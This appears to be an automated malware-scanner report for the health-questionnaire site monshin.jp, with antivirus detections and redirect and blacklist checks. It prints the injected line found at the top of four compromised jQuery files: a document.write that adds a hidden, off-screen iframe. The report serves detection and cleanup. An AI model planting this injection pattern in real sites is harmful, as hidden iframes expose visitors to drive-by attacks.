New scan:

Malware Scanner report for monshin.jp

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://monshin.jp/
200 OK
Content-Length: 13240
Content-Type: text/html
clean
http://monshin.jp/js/jquery.js
200 OK
Content-Length: 57422
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(ty
... 3151 bytes are skipped ...
0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-ALS [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

http://monshin.jp/js/jquery.min.js
200 OK
Content-Length: 155660
Content-Type: text/javascript
clean
http://monshin.jp/js/jquery.cookie.js
200 OK
Content-Length: 4414
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>');
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { options = options || {};
if (value === null) {
value = '';
options.expires = -1;
}
var expires = '';
if (option
... 925 bytes are skipped ...
br/> var cookies = document.cookie.split(';');
for (var i = 0; i < cookies.length; i++) {
var cookie = jQuery.trim(cookies[i]);
if (cookie.substring(0, name.length + 1) == (name + '=')) {
cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
break;
}
}
}
return cookieValue;
}
};

Antivirus reports:

Sophos
Troj/Iframe-IP

http://monshin.jp/js/jquery.fontsizechange.js
200 OK
Content-Length: 2988
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>');(function($){
$(function(){
fontsizeChange();
});
function fontsizeChange(){
var changeArea = $(".changeArea"); var btnArea = $("#fontSize"); var changeBtn = btnArea.find(".changeBtn"); var fontSize = [100,116,131]; var ovStr = "_ov"; var active
... 1566 bytes are skipped ...
imgChange(self,self,"",ovStr);
}
},
function(){
mouseOut();
});
});
}
changeBtn.click(function(){
var index = changeBtn.index(this);
var self = $(this);
cookieSet(index);
sizeChange();
if(useImg){
mouseOut();
}
if(!self.hasClass(activeClass)){
changeBtn.not(this).removeClass(activeClass);
self.addClass(activeClass);
}
});
}
})(jQuery);

Antivirus reports:

Sophos
Troj/Iframe-IP

http://monshin.jp/js/tab_change.js
200 OK
Content-Length: 1276
Content-Type: text/javascript
clean
http://monshin.jp/body/metabolic-syndrome/metabolic-syndrome-check/
200 OK
Content-Length: 19140
Content-Type: text/html
clean
http://monshin.jp/js/jquery.screwdefaultbuttons.js
200 OK
Content-Length: 8579
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<style>.ax70piu { position:absolute; left:-1996px; top:-1754px} </style> <div class="ax70piu"><iframe src="" width="135" height="445"></iframe></div>');

(function($) {
$.fn.screwDefaultButtons = function(options) {
options = $.extend($.fn.screwDefaultButtons.defaults, options);

var checkedImage = options.checked;
var uncheckedImage = options.unchecked;
var disabledImage = options.disabled;
var
... 3572 bytes are skipped ...
/> }

$('.styledRadio').css({'cursor':'pointer', "background-repeat":"no-repeat"});
$('.styledCheckbox').css({'cursor':'pointer', "background-repeat":"no-repeat"});


}


$.fn.screwDefaultButtons.defaults = {
checked: "url(images/radio_Checked.jpg)",
unchecked: "url(images/radio_Unchecked.jpg)",
disabled: false,
disabledChecked: false,
selectAll: null,
width: 20,
height: 20
};
})(jQuery);

Antivirus reports:

Sophos
Troj/Iframe-IP

http://monshin.jp/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://monshin.jp/body/insomnia/insomnia-check/
200 OK
Content-Length: 18494
Content-Type: text/html
clean
http://monshin.jp/body/diabetes-mellitus/diabetes/
200 OK
Content-Length: 17656
Content-Type: text/html
clean
http://monshin.jp/body/diabetes-mellitus/diabetes-mellitus-check/
200 OK
Content-Length: 18544
Content-Type: text/html
clean
http://monshin.jp/body/hypertension/high-blood-check/
200 OK
Content-Length: 16597
Content-Type: text/html
clean
http://monshin.jp/body/asthma/asthma-check/
200 OK
Content-Length: 15079
Content-Type: text/html
clean
http://monshin.jp/body/pollakiuria-and-residualurine/prostatomegaly-check/
200 OK
Content-Length: 19433
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: monshin.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:37:20 GMT
Server: Apache
Content-Type: text/html
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:37:20 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: monshin.jp
Referer: http://www.google.com/search?q=monshin.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=monshin.jp

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://monshin.jp/

Result: monshin.jp is not infected or malware details are not published yet.